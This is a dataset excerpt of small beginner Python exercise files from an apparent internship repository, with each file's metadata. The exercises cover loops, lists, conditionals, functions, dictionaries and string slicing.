"avg_line_length": 24, "blob_id": "1a7fc1a79d6457d87baf89b0e07aa20008952516", "content_id": "888b9104ddad173884484a8cea21e3f8dba213f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 102, "license_type": "no_license", "max_line_length": 36, "num_lines": 4, "path": "/Day3task10.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "list1 = [10, 20, \"Akash Technolabs\"]\r\n\r\nfor i in range(len(list1)):\r\n print('Value is :', list1[i])" }, { "alpha_fraction": 0.4126984179019928, "alphanum_fraction": 0.5714285969734192, "avg_line_length": 13.75, "blob_id": "18fda3256e211c725bf7f8141e1b110c1b187d6b", "content_id": "5782dd00ff0ec69d25ee97c7c0c3b8e694c2bf05", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 63, "license_type": "no_license", "max_line_length": 20, "num_lines": 4, "path": "/Day4task5.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "def calSum(n1, n2):\r\n print(n1+n2)\r\n\r\ncalSum(n2=10, n1=20)\r\n" }, { "alpha_fraction": 0.49193549156188965, "alphanum_fraction": 0.524193525314331, "avg_line_length": 13.75, "blob_id": "3e902335dfa69f6858de5e53055ccde5adeda256", "content_id": "05ef62af5705530fe69d2c987785e881113b2850", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 124, "license_type": "no_license", "max_line_length": 27, "num_lines": 8, "path": "/Day3task11.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "a=[12,14,\"happy\"]\r\nprint(a)\r\n\r\nfor i in a:\r\n print(\"Value is \",i)\r\n\r\nfor j in range(len(a)):\r\n print(\"Value is \",a[j])" }, { "alpha_fraction": 0.353658527135849, "alphanum_fraction": 0.4146341383457184, "avg_line_length": 12, "blob_id": "7b97e36009cb4afa8347ce670fc355e2bcdb7963", "content_id": "fadac3218a5ae918b32a4698cef99e8947332db3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 82, "license_type": "no_license", "max_line_length": 24, "num_lines": 6, "path": "/Day3task13.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "i=0\r\nwhile i<10:\r\n print(\"Value is:\",i)\r\n i +=1\r\n if i>=5:\r\n break" }, { "alpha_fraction": 0.56175297498703, "alphanum_fraction": 0.5936254858970642, "avg_line_length": 21, "blob_id": "a94fe118fda97a2884a960a4b6e04c3f8600033c", "content_id": "5d1164b6c53b9d3d5ff281bf9d41115356b215ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 251, "license_type": "no_license", "max_line_length": 32, "num_lines": 11, "path": "/Day3task9.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "for i in range(10):\r\n print(\"value is\", i)\r\nprint(\"These are values of i\\n\")\r\n\r\nfor j in range(1,5):\r\n print(\"value is\", j)\r\nprint(\"These are values of j\\n\")\r\n\r\nfor k in range(1,10, 2):\r\n print(\"value is\", k)\r\nprint(\"These are values of k\\n\")" }, { "alpha_fraction": 0.4464285671710968, "alphanum_fraction": 0.5357142686843872, "avg_line_length": 17.33333396911621, "blob_id": "ef173ef50b9fa6c7fbfa473fe852825375df1944", "content_id": "bbcb33382f73a51eccd5406e5fec4139f9fa06d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 56, "license_type": "no_license", "max_line_length": 24, "num_lines": 3, "path": "/Day4task4.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "def sum(a,b):\r\n print(\"Sum is:\",a+b)\r\nsum(b=240,a=20)" }, { "alpha_fraction": 0.44117647409439087, "alphanum_fraction": 0.5441176295280457, "avg_line_length": 15.5, "blob_id": "8ab8741ed846554f65f4fcfa92d91215bc975ef0", "content_id": "7aa17f2b9862d78c1473e8e8a580511984e079ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 68, "license_type": "no_license", "max_line_length": 24, "num_lines": 4, "path": "/Day3task8.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "l1=[30,40,'hey!']\r\nprint(l1)\r\nfor i in l1:\r\n print(\"value is \",i)" }, { "alpha_fraction": 0.4166666567325592, "alphanum_fraction": 0.6111111044883728, "avg_line_length": 12.800000190734863, "blob_id": "72c2e30f8451109a99ca15fca3e2884f1395faa9", "content_id": "bf0961fb1cdee57abb353f3f07a17d9c93bc0305", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 72, "license_type": "no_license", "max_line_length": 27, "num_lines": 5, "path": "/Day4task3.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "def calSum(n1=100, n2=200):\r\n print(n1+n2)\r\n\r\ncalSum(10,20)\r\ncalSum()" }, { "alpha_fraction": 0.41025641560554504, "alphanum_fraction": 0.4615384638309479, "avg_line_length": 20.571428298950195, "blob_id": "1672f8ca67b74f7972463b2574c5beb1d9da4a8d", "content_id": "ea61417d25b85cf07e90bc431750987bfe5cdbe8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 156, "license_type": "no_license", "max_line_length": 42, "num_lines": 7, "path": "/Day2task11.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "d = { 1: 'Satoru',2: 'Suguru', 'key': 10 }\r\nprint (type(d))\r\n\r\nprint (\"d[1] = \", d[1])\r\nprint (\"d[2] = \", d[2])\r\nprint (\"d[key] = \", d['key'])\r\n#disctionary" }, { "alpha_fraction": 0.5430463552474976, "alphanum_fraction": 0.5827814340591431, "avg_line_length": 17.125, "blob_id": "5c432cc7c59dbfafebec154b4bb7426c51e01165", "content_id": "611b1dec0eb025047887bfdd93177f88cae47b3e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 151, "license_type": "no_license", "max_line_length": 24, "num_lines": 8, "path": "/Day2task7.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "name=\"Shriya Patel\"\r\nprint(\"Name is :\", name)\r\nprint(name [0])\r\nprint(name [2:5])\r\nprint(name[2:])\r\nprint(name [:4])\r\nprint(name*2)\r\nprint (name + \" Hello \")" }, { "alpha_fraction": 0.5769230723381042, "alphanum_fraction": 0.6307692527770996, "avg_line_length": 14.25, "blob_id": "111e458666c738c0dd8e2eeafe3c0ce7fb60dbc1", "content_id": "ac92be8695c4ae8c78ea2176ae49b051652472b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 130, "license_type": "no_license", "max_line_length": 22, "num_lines": 8, "path": "/Day4task2.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "def myfunction():\r\n name=\"Shanish\"\r\n n1=20\r\n return name,n1\r\n\r\nname,n1=myfunction()\r\nprint(\"Name is \",name)\r\nprint(\"n1 is \",n1)\r\n" }, { "alpha_fraction": 0.720588207244873, "alphanum_fraction": 0.720588207244873, "avg_line_length": 21.33333396911621, "blob_id": "c7bb7b834a0e8dc515be407ff6b3ca27957d54c8", "content_id": "a7b2b3fe75f876610fe71593552dc59bf20c90cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 68, "license_type": "no_license", "max_line_length": 30, "num_lines": 3, "path": "/Day4task10.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "import demo \r\nname=demo.myfunction(\"shriya\")\r\nprint(\"Name is \",name)" }, { "alpha_fraction": 0.35593220591545105, "alphanum_fraction": 0.4237288236618042, "avg_line_length": 12.75, "blob_id": "8ca040bc7b38c4baa6cde371db0f04eda3ea84ba", "content_id": "5c3896d2a161c565ed51c6b886d95247e8939f5b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 59, "license_type": "no_license", "max_line_length": 26, "num_lines": 4, "path": "/Day3task6.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "i=1\r\nwhile i<=10:\r\n print(\"value is \", i)\r\n i +=1\r\n" }, { "alpha_fraction": 0.32786884903907776, "alphanum_fraction": 0.5163934230804443, "avg_line_length": 32.85714340209961, "blob_id": "bf4ac4836d5f793b4458d4ad861d001ba548d438", "content_id": "0d9403ccbf42b1375b4be8aafc5cc8ae45cfeb35", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 244, "license_type": "no_license", "max_line_length": 55, "num_lines": 7, "path": "/Day2task9.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "list1 = [10, 20, 30, \"Akash\", 40, 50, \"Technolabs\", 60]\r\n#list1[2] = 30\r\nprint (\"liat1[2] = \" , list1[2])\r\n#list1[0:3]= [10,20,35]\r\nprint(\"iist1 [0:3] = \" , list1[0:3])\r\n#list1[5:] = [50, 'Technolabs', 60]\r\nprint (\"list1 [5:] = \", list1 [5:])\r\n" }, { "alpha_fraction": 0.6354166865348816, "alphanum_fraction": 0.6354166865348816, "avg_line_length": 22.5, "blob_id": "38d26e07474f152e43a74a58f4a2ee8be2a3a592", "content_id": "6f6ae5f32ed591091e1e8487bb236465c5f21295", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 96, "license_type": "no_license", "max_line_length": 32, "num_lines": 4, "path": "/Day3task1.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "a=int(input(\"Enter first no:\"))\r\nb=int(input(\"Enter second no:\"))\r\nans=a+b\r\nprint(\"Ans is:\",ans)" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.5804597735404968, "avg_line_length": 12.666666984558105, "blob_id": "373c310eeae8b89da8f5a1461e5750a9d2332508", "content_id": "c42aa7c96ec69e8023c3f779b3cc850c5989c3b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 174, "license_type": "no_license", "max_line_length": 37, "num_lines": 12, "path": "/Day3task4.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "#IF ELIF ELSE STATEMENT\r\n\r\nn1=20\r\nn2=30\r\nif n1==n2:\r\n print(\"Both n1 and n2 are equal\")\r\n\r\nelif n1>n2:\r\n print(\"n1 is greater\") \r\n\r\nelse:\r\n print(\"n2 is greater\")" }, { "alpha_fraction": 0.455089807510376, "alphanum_fraction": 0.514970064163208, "avg_line_length": 13.363636016845703, "blob_id": "fcda86034569816478b2af7cbd69092266993f9b", "content_id": "9696bfa1a51d4c564f4d0e5b2a90556da8a6a134", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 167, "license_type": "no_license", "max_line_length": 31, "num_lines": 11, "path": "/Day3task5.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "#NESTED IF STATEMENT\r\n\r\nn1=10\r\n\r\nif n1>=0:\r\n if n1==0:\r\n print(\"n1 is Zero\")\r\n else: \r\n print(\"n1 is Positive\")\r\nelse:\r\n print(\"n1 is Negative\")" }, { "alpha_fraction": 0.5555555820465088, "alphanum_fraction": 0.6570048332214355, "avg_line_length": 27.85714340209961, "blob_id": "a0487463d54d07b1f405f7b016e99fb2ccb4fc47", "content_id": "be295b72209f70c0babb946772659556e2bd8c60", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 207, "license_type": "no_license", "max_line_length": 57, "num_lines": 7, "path": "/Day2task6.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "n1=10\r\nprint(n1, \"is of type\", type(n1))\r\nn2=10.5\r\nprint(n2, \"is of type\", type(n2))\r\nprint(n2, \"is complex number?\", isinstance(10.5,int))\r\nn3=1+2j\r\nprint(n3, \"is complex number?\", isinstance(1+2j,complex))" } ]
34
rnoshir/visualization_matplotlib_project
https://github.com/rnoshir/visualization_matplotlib_project
15a59966115e32970d64d90b42fb7dc3b8e3c63a
cacac8728a58aeef3566344c59d415ff9e39976a
7705874a437938a01b207e6e472adfacfd3196a1
refs/heads/master
2021-08-31T20:17:55.402203
2017-12-22T18:01:49
2017-12-22T18:01:49
114,914,054
0
0
null
2017-12-20T17:34:21
2017-10-01T12:46:31
2017-12-19T18:03:04
null
[ { "alpha_fraction": 0.6822429895401001, "alphanum_fraction": 0.6822429895401001, "avg_line_length": 23.69230842590332, "blob_id": "1cfb6576973dac2ea77126c0b25eae205f10e12e", "content_id": "6ddaf9b1754b4dee90cf712e2d79f1314871543b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 321, "license_type": "no_license", "max_line_length": 60, "num_lines": 13, "path": "/q02_plot_matches_by_team/build.py", "repo_name": "rnoshir/visualization_matplotlib_project", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nipl_df = pd.read_csv('data/ipl_dataset.csv', index_col=None)\n\n\n# Solution\ndef plot_matches_by_team():\n teams=ipl_df[['batting_team']]\n g_teams=teams.groupby('batting_team')\n g_teams[['batting_team']].count().plot(kind='bar')\n plt.show()\n" }, { "alpha_fraction": 0.6397228837013245, "alphanum_fraction": 0.6581985950469971, "avg_line_length": 24.47058868408203, "blob_id": "be1e2f23caadbd56a45e96b4aa0eb9793ab63ff9", "content_id": "683d55fdd5c822d8a06a11f2d2d7ada35dd7a0ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 433, "license_type": "no_license", "max_line_length": 60, "num_lines": 17, "path": "/q03_plot_innings_runs_histogram/build.py", "repo_name": "rnoshir/visualization_matplotlib_project", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nipl_df = pd.read_csv('data/ipl_dataset.csv', index_col=None)\n\n\n# Solution\ndef plot_innings_runs_histogram():\n data=ipl_df[['batting_team','inning','runs']]\n g_inning=data.groupby(['batting_team','inning'])\n runs=g_inning['runs'].count().unstack()\n plt.subplot(1,2,1)\n plt.hist(runs[1])\n plt.subplot(1,2,2)\n plt.hist(runs[2])\n plt.show()\n" } ]
2
jeevsand/naan-factory
https://github.com/jeevsand/naan-factory
14708971ab7f66455ce127e9e59be7898b1aeb28
9b56f90ba90a697e0bb034a452ee7ddce2ef046c
95dc2ed9e3f79a177e80a62ec46251e04dcb272c
refs/heads/master
2020-06-24T15:35:26.036784
2019-07-24T14:53:00
2019-07-24T14:53:00
199,002,549
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6775568127632141, "alphanum_fraction": 0.6889204382896423, "avg_line_length": 15.785714149475098, "blob_id": "081bd8026023154fb8db21b35b85ea5d13317f20", "content_id": "8d98472baefd0845af0e124d5d4f7af38b2d9251", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 704, "license_type": "no_license", "max_line_length": 54, "num_lines": 42, "path": "/README.md", "repo_name": "jeevsand/naan-factory", "src_encoding": "UTF-8", "text": "#This is a title\n##This is a subtitle (h2)\n###This is a smaller subtitle (h3)\n####This is a h4\nthis is a text \n\nthis is a text in **bold**\n\n- bullet points \n\n1) add a git\n2) add a git ignore file (touch .gitignore)\n3) git add .\n\n\n## Naan Factory Specs\nWe need to build a naan factory.\nThe following is what we need:\n#### make_dough function \nTakes in:\n- 'wheat'\n- 'water'\n\nShould return: 'dough'\n\n####bake_naan function \nTakes in:\n- 'dough'\n\nreturnds: 'naan'\n\n\n\n\n#Assignment \n\n- create a new project \n- add git tracting \n- write test for your naan factory \n- write function to make all test pass \n- write a README.md file explain task and functions \n- you should have atleast 3 to 5 commits in your logs." }, { "alpha_fraction": 0.7254063487052917, "alphanum_fraction": 0.7322497963905334, "avg_line_length": 26.85714340209961, "blob_id": "1d85b75e0e836e6c99bc3e72e8f948b8cadcef80", "content_id": "960070035a4f5d37cefcfff88fde38a089dbd76c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1169, "license_type": "no_license", "max_line_length": 92, "num_lines": 42, "path": "/hello.py", "repo_name": "jeevsand/naan-factory", "src_encoding": "UTF-8", "text": "##FUnction principles:\n #they only do one job\n #should be unitary\n #should do the above so they are testable\n #do not print inside functions... you return\n #need to be called to run\n\n#Unit tests : are tests that test 1 function\n\n#TDD: Test driven development\n#write your tests according to specs\n#Then follow the errors and iterate until test pass\n\ndef say_hello():\n return 'hello'\n\nprint (say_hello())\n\ndef say_hello_personal(name_arg):\n return 'hello ' + name_arg.capitalize()\n\ndef full_name_hello(arg1,arg2):\n return 'hello '+arg1.capitalise()+ ' '+arg2.capitalise()\n\nprint (say_hello_personal('Isabella'))\n\n##Testing\n#has two main section: Setup and Evaluatation\n#You give it controlled input and test for expected outcomes\n\n#Test 1: say_hello functions\n#Spec: when call should return string 'hello'\nsetup_results = say_hello()\nprint(setup_results == 'hello')\n\n#Test 2: testing say hello personalize functions\nsay_hello_personal('Isabella')=='Hello Isabella'\n\n\n#Test 3: testing function full_name_hello\nprint(\"calling function full_name_hello() with Isabella Jones, expect 'hello Isabella Jones' to be printed\")\nprint(full_name_hello('isabella', 'jones')== 'hello Isabella Jones')" } ]
2
MiguelVillanuev4/EDA1-Practica12
https://github.com/MiguelVillanuev4/EDA1-Practica12
ef78cb70f95632056828aaa7382781b5b1b64404
aebad98756afc4b864727e8f3eb95ede25ad2ab9
83b2eb9fba916bdff7d6d4e01c29da0248cab795
refs/heads/master
2022-04-26T16:43:41.332319
2020-04-29T01:06:37
2020-04-29T01:06:37
259,789,542
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6418918967247009, "alphanum_fraction": 0.6689189076423645, "avg_line_length": 22.66666603088379, "blob_id": "aa045d77ac2af9cfcd0e8e1d4411c28aaa7ef844", "content_id": "af0e19d3f5c3bad14026a05f00c94528589442c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 148, "license_type": "no_license", "max_line_length": 50, "num_lines": 6, "path": "/Factorial.py", "repo_name": "MiguelVillanuev4/EDA1-Practica12", "src_encoding": "UTF-8", "text": "def factorial_recursivo(numero):\r\n if numero<2:\r\n return 1\r\n return numero* factorial_recursivo(numero - 1)\r\n\r\nfactorial_recursivo(5)\r\n" }, { "alpha_fraction": 0.6192468404769897, "alphanum_fraction": 0.6610878705978394, "avg_line_length": 24.55555534362793, "blob_id": "1d876f3ce67f571b04153301eaf592a98ccf5eec", "content_id": "085ae58604b555bd542ebd52bab1f659cc4cce3d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 239, "license_type": "no_license", "max_line_length": 71, "num_lines": 9, "path": "/fibonacciMemo.py", "repo_name": "MiguelVillanuev4/EDA1-Practica12", "src_encoding": "UTF-8", "text": "memoria ={1:0, 2:1, 3:1}\r\n\r\ndef fibonacci_memo(numero):\r\n if numero in memoria:\r\n return memoria[numero]\r\n memoria[numero]=fibonacci_memo(numero-1) + fibonacci_memo(numero-2)\r\n return memoria[numero]\r\n\r\nfibonacci_memo(13)\r\n" }, { "alpha_fraction": 0.6026785969734192, "alphanum_fraction": 0.6428571343421936, "avg_line_length": 25.75, "blob_id": "ada0124e06f85be745c4ed01df7e163c5586bfd7", "content_id": "d531b52bb16b53934863461aad7c7e43e78c2faa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 224, "license_type": "no_license", "max_line_length": 72, "num_lines": 8, "path": "/FibonacciRecursivo.py", "repo_name": "MiguelVillanuev4/EDA1-Practica12", "src_encoding": "UTF-8", "text": "def fibonacci_recursivo(numero):\r\n if numero==1:\r\n return 0\r\n if numero==2 or numero==3:\r\n return 1\r\n return fibonacci_recursivo(numero-1) + fibonacci_recursivo(numero-2)\r\n\r\nfibonacci_recursivo(13)\r\n\r\n" }, { "alpha_fraction": 0.5668789744377136, "alphanum_fraction": 0.5923566818237305, "avg_line_length": 20.428571701049805, "blob_id": "8885910c747a59bc250f36b86cb4cc2c6ccb8cab", "content_id": "77caa2ac8e18005750dc2db1343c2f5f0fa554ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 157, "license_type": "no_license", "max_line_length": 35, "num_lines": 7, "path": "/FactorialNo.py", "repo_name": "MiguelVillanuev4/EDA1-Practica12", "src_encoding": "UTF-8", "text": "def factorial_no_recursivo(numero):\r\n fact=1\r\n for i in range(numero, 1, -1):\r\n fact = fact * i \r\n return fact\r\n\r\nfactorial_no_recursivo(5)\r\n" } ]
4
root-folder/instamark
https://github.com/root-folder/instamark
ca52dec77422226f24ac220c9fd0d908185d4734
5a2eadb17b9763300bbc7d6fc5044d1db89402d5
41ff308ea1f146cd733a00a9cfed90071b50447f
refs/heads/master
2022-12-09T05:51:39.483812
2020-08-18T12:57:53
2020-08-18T12:57:53
288,449,384
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6013578772544861, "alphanum_fraction": 0.6246362924575806, "avg_line_length": 18.846153259277344, "blob_id": "d9438f4d75c088a383ad847607ee1ce1f16c2823", "content_id": "555ee09e79e69b2d2503040af2c062c71e8f9b63", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1031, "license_type": "no_license", "max_line_length": 47, "num_lines": 52, "path": "/instamark.py", "repo_name": "root-folder/instamark", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nline = \"-\" * 35\n\na = ('Distinction','A')\nb = ('Merit','B')\nc = ('Credit','C')\nd = ('Satisfactory', ' D')\nf = ('UnSatisfactory', 'F')\n\ndef unpacker(values):\n\tfor item in values:\n\t\tprint(item)\n\tprint(line)\n\ndef calculator(paper_mark = 0, pupil_mark = 0):\n\tpercent = (pupil_mark / paper_mark) * 100\n\treturn round(percent)\n\ndef invalid_value():\n\tprint(\"Invalid value!\")\n\tprint(line)\n\ndef decider(percentage = 0):\n\tif (percentage < 1) | (percentage > 100):\n\t\tinvalid_value()\n\telif percentage >= 75:\n\t\tprint(str(percentage) + '%')\n\t\tunpacker(a)\n\telif percentage >= 65:\n\t\tprint(str(percentage) + '%')\n\t\tunpacker(b)\n\telif percentage >= 40:\n\t\tprint(str(percentage) + '%')\n\t\tunpacker(c)\n\telif percentage >= 30:\n\t\tprint(str(percentage) + '%')\n\t\tunpacker(d)\n\telif percentage < 30:\n\t\tprint(str(percentage) + '%')\n\t\tunpacker(f)\n\ntry:\n\tpaper = int(input(\"Paper's Mark: \"))\n\n\twhile True:\n\t\tpupil = int(input(\"Pupil's Mark: \"))\n\t\tif pupil == 0:\n\t\t\tprint(\"Good Bye!\")\n\t\t\tbreak\n\t\tdecider(calculator(paper, pupil))\nexcept:\n\tpass" }, { "alpha_fraction": 0.7872340679168701, "alphanum_fraction": 0.7978723645210266, "avg_line_length": 36.599998474121094, "blob_id": "641e79b4723abdaa601d27148d33308cd210ab8b", "content_id": "d0c67b9fcbd07254a44145ca41004f19e6e27ca2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 188, "license_type": "no_license", "max_line_length": 62, "num_lines": 5, "path": "/README.md", "repo_name": "root-folder/instamark", "src_encoding": "UTF-8", "text": "# instamark\nthe program gives instant results when grading students papers\nstep 1: enter the paper's mark\nstep 2: enter the pupil's mark\nthe program gives a percentage mark, and the grade\n" } ]
2
OffTheMark/SpaceSkirmishers
https://github.com/OffTheMark/SpaceSkirmishers
221dfc00e036ffc61166315abe9e220208801479
54ead1d73d227b0d41e218947e1f662986c1c319
12e90de018e2024e87cf008baccf69d98a317c19
refs/heads/master
2021-01-22T17:29:18.435537
2017-03-15T23:51:51
2017-03-15T23:51:51
85,020,692
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5677452087402344, "alphanum_fraction": 0.581507682800293, "avg_line_length": 36.55696105957031, "blob_id": "36800603c05b4b79de640a2a9687f051b3fe5c41", "content_id": "685c89cd643777324b354de2a345659504549de4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17802, "license_type": "no_license", "max_line_length": 147, "num_lines": 474, "path": "/space_skirmishers.py", "repo_name": "OffTheMark/SpaceSkirmishers", "src_encoding": "UTF-8", "text": "import pygame\nimport sys\nfrom random import randint\n\n\nGAME_TITLE = \"Space Skirmishers\"\nPLAYER_1_NAME = \"Player 1\"\nPLAYER_2_NAME = \"Player 2\"\nBULLET_NAME = \"Bullet\"\nOBSTACLE_NAME = \"Obstacle\"\n\nNEAR_BLACK = (19, 15, 48)\nGREEN = (0, 255, 0)\nYELLOW = (255, 255, 0)\nRED = (255, 0, 0)\nBLUE = (0, 0, 255)\nORANGE = (255, 69, 0)\nWHITE = (255, 255, 255)\n\nPLAYER_1_KEY_UP = pygame.K_w\nPLAYER_1_KEY_DOWN = pygame.K_s\nPLAYER_1_KEY_SHOOT = pygame.K_SPACE\nPLAYER_2_KEY_UP = pygame.K_UP\nPLAYER_2_KEY_DOWN = pygame.K_DOWN\nPLAYER_2_KEY_SHOOT = pygame.K_KP0\n\nCOLOR_BACKGROUND = NEAR_BLACK\nCOLOR_BULLET = RED\nCOLOR_HP_3 = GREEN\nCOLOR_HP_2 = YELLOW\nCOLOR_HP_1 = ORANGE\nCOLOR_PLAYER_1_BULLET = BLUE\nCOLOR_PLAYER_2_BULLET = RED\nCOLOR_OBSTACLE = GREEN\n\nTITLE_TEXT_SIZE = 75\nSUBTITLE_TEXT_SIZE = 40\nTITLE_SUBTITLE_MARGIN = 10\n\nPLAYER_WIDTH = 25\nPLAYER_HEIGHT = 80\nPLAYER_SPEED = 20\nPLAYER_1_BULLET_DIRECTION_X = 1\nPLAYER_2_BULLET_DIRECTION_X = -1\nPLAYER_MAX_BULLETS = 2\n\nBULLET_WIDTH = 10\nBULLET_HEIGHT = 5\nBULLET_DELAY = 500\nBULLET_SPEED = 20\n\nOBSTACLE_HEIGHT = 20\nOBSTACLE_WIDTH = 20\nOBSTACLE_TYPE_1_ROWS = 6\nOBSTACLE_TYPE_1_COLUMNS = 4\nOBSTACLE_TYPE_2_ROWS = 4\nOBSTACLE_TYPE_2_COLUMNS = 4\n\nSCREEN_WIDTH = 800\nSCREEN_HEIGHT = 600\nSCREEN_MARGIN = 15\nBOUNDS_MIN_X = SCREEN_MARGIN\nBOUNDS_MAX_X = SCREEN_WIDTH - SCREEN_MARGIN\nBOUNDS_MIN_Y = SCREEN_MARGIN\nBOUNDS_MAX_Y = SCREEN_HEIGHT - SCREEN_MARGIN\nBULLET_MARGIN = (PLAYER_WIDTH - BULLET_WIDTH) / 2\nOBSTACLE_MARGIN_X = 100\nOBSTACLE_MARGIN_Y = 50\nOBSTACLE_BOUNDS_MIN_X = BOUNDS_MIN_X + OBSTACLE_MARGIN_X\nOBSTACLE_BOUNDS_MAX_X = BOUNDS_MAX_X - OBSTACLE_MARGIN_X\nOBSTACLE_BOUNDS_MIN_Y = BOUNDS_MIN_Y + OBSTACLE_MARGIN_Y\nOBSTACLE_BOUNDS_MAX_Y = BOUNDS_MAX_Y - OBSTACLE_MARGIN_Y\n\nLEVELS = [\n [\n {\n \"top\": OBSTACLE_BOUNDS_MIN_Y,\n \"left\": OBSTACLE_BOUNDS_MIN_X,\n \"rows\": OBSTACLE_TYPE_1_ROWS,\n \"columns\": OBSTACLE_TYPE_1_COLUMNS\n },\n {\n \"top\": OBSTACLE_BOUNDS_MAX_Y - OBSTACLE_TYPE_1_ROWS * OBSTACLE_HEIGHT,\n \"left\": OBSTACLE_BOUNDS_MIN_X,\n \"rows\": OBSTACLE_TYPE_1_ROWS,\n \"columns\": OBSTACLE_TYPE_1_COLUMNS\n },\n {\n \"top\": OBSTACLE_BOUNDS_MIN_Y,\n \"left\": OBSTACLE_BOUNDS_MAX_X - OBSTACLE_TYPE_1_COLUMNS * OBSTACLE_WIDTH,\n \"rows\": OBSTACLE_TYPE_1_ROWS,\n \"columns\": OBSTACLE_TYPE_1_COLUMNS\n },\n {\n \"top\": OBSTACLE_BOUNDS_MAX_Y - OBSTACLE_TYPE_1_ROWS * OBSTACLE_HEIGHT,\n \"left\": OBSTACLE_BOUNDS_MAX_X - OBSTACLE_TYPE_1_COLUMNS * OBSTACLE_WIDTH,\n \"rows\": OBSTACLE_TYPE_1_ROWS,\n \"columns\": OBSTACLE_TYPE_1_COLUMNS\n },\n {\n \"top\": OBSTACLE_BOUNDS_MIN_Y + 0.5 * (OBSTACLE_BOUNDS_MAX_Y - OBSTACLE_BOUNDS_MIN_Y) - 0.5 * OBSTACLE_TYPE_1_ROWS * OBSTACLE_HEIGHT,\n \"left\": OBSTACLE_BOUNDS_MIN_X + 0.5 * (OBSTACLE_BOUNDS_MAX_X - OBSTACLE_BOUNDS_MIN_X) - 0.5 * OBSTACLE_TYPE_1_COLUMNS * OBSTACLE_WIDTH,\n \"rows\": OBSTACLE_TYPE_1_ROWS,\n \"columns\": OBSTACLE_TYPE_1_COLUMNS\n }\n ],\n [\n {\n \"top\": OBSTACLE_BOUNDS_MIN_Y + 0.5 * (OBSTACLE_BOUNDS_MAX_Y - OBSTACLE_BOUNDS_MIN_Y) - 0.5 * OBSTACLE_TYPE_2_ROWS * OBSTACLE_HEIGHT,\n \"left\": OBSTACLE_BOUNDS_MIN_X,\n \"rows\": OBSTACLE_TYPE_2_ROWS,\n \"columns\": OBSTACLE_TYPE_2_COLUMNS\n },\n {\n \"top\": OBSTACLE_BOUNDS_MIN_Y + 0.5 * (OBSTACLE_BOUNDS_MAX_Y - OBSTACLE_BOUNDS_MIN_Y) - 0.5 * OBSTACLE_TYPE_2_ROWS * OBSTACLE_HEIGHT,\n \"left\": OBSTACLE_BOUNDS_MAX_X - OBSTACLE_TYPE_2_COLUMNS * OBSTACLE_WIDTH,\n \"rows\": 